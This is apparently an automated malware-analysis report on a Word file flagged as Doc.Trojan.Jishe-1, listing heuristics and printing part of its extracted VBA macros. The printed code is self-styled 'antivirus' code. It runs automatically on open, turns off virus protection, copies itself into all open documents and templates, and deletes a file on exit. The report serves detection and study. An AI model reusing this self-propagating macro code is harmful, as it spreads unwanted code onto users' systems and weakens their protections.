MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file contains legacy WordBasic and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The document body is presented as an official notification about technical innovation projects, a common lure to trick users into enabling macros. The presence of these macros and the ClamAV detection strongly suggest a malicious document designed to execute arbitrary code upon opening.
Heuristics 5
-
ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jishe-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46041 bytes |
SHA-256: 7ef35b57547ffbd74c27222bd720df74d76fe50c85f1b8d9258faa47990f21e3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Const answer0 = "FreeWordMacroVirusKiller" '保持与以前版本的兼容性
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" '本程序标志
'Version 2.0
Private Sub Document_Open()
CloseVirusProtection
'检查打开的文档中是否有病毒
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
Attribute VB_Name = "JiShenhua"
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Option Explicit '程序中的变量必须先定义后使用
Public pVirusReport As String '病毒描述信息
Private Const cMyID As String = "MyMacroVirusKiller" '本程序代码标志
Private Const cMyVersion As String = "V2.2" '本程序版本标准
Private Const cMyModule As String = "JiShenhua" '本程序的模块名称
Private Const cMyUserForm As String = "VirusReport" '本程序的用户窗口名称
Private Const cLinesofThisDocument As Integer = 24 '在ThisDocument模块中全部代码的行数
Private Const cOK As Integer = 0 '一切正常
Private Const cDocHasModuleElse As Integer = 1 '有其他模块存在
Private Const cDocHasCodeElse As Integer = 2 '在ThisDocument模块中有其他代码存在
Private Const cDocHasAllElse As Integer = 3 '在ThisDocument模块中有其他代码存在,并有其他模块存在
Private Const cDocProtected As Integer = 4 '该文档被保护
Private Const cDocHasOldVersion As Integer = 8 '该文档中有旧版本该杀病毒模块
'打开文档时自动执行
Sub AutoOpen()
CloseVirusProtection
'检查打开的文档中是否有病毒,如果有病毒,向用户提出报告
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
'新建文档时自动执行
Sub AutoNew()
CloseVirusProtection
Infect Word.ActiveDocument
End Sub
'关闭WORD之前清理autoexec.dot文件中的病毒
Sub AutoExit()
Const AutoDotFile = "C:\AUTOEXEC.DOT"
If Dir(AutoDotFile) <> "" Then
Kill AutoDotFile
End If
End Sub
'从指定文件中向所有打开文档及模板中复制本程序代码及模块
Public Function InfectAll() As Boolean
Dim myDoc As Document, myTemp As Template
'向打开的文档中写入本代码
For Each myDoc In Documents
Infect myDoc
Next myDoc
'向WORD模板中写入本代码
For Each myTemp In Templates
Infect myTemp
Next myTemp
InfectAll = True
End Function
'清除所有打开文档及模板中的病毒模块及代码
Public Function ClearVirus() As Boolean
Dim myDoc As Document, myTemp As Template
Dim Cleared As Boolean
ClearVirus = True
'检查所有文档并清除
For Each myDoc In Documents
Cleared = ClearDocument(myDoc)
If Not Cleared Then
MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myDoc.Name
ClearVirus = False
End If
Next myDoc
'检查所有模板并清除
For Each myTemp In Templates
Cleared = ClearDocument(myTemp)
If Not Cleared Then
MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myTemp.Name
ClearVirus = False
End If
Next myTemp
End Function
'检查所有打开的文档及模板中是否有病毒存在,如果有,返回病毒信息描述字符串
Public Function ScanVirus() As Boolean
Dim Ret As Integer, myDoc As Document, myTemp As Template
ScanVirus = False
pVirusReport = ""
'检查所有打开的文档中是否有病毒
For Each myDoc In Documents
Ret = ScanDocument(myDoc)
Select Case Ret
Case cOK, cDocProtected
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse, cDocHasOldVersion
ScanVirus = True
Case Else
MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
End Select
Next myDoc
'检查所有模板
For Each myTemp In Templates
Ret = ScanDocument(myTemp)
Select Case Ret
Case cOK, cDocProtected
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.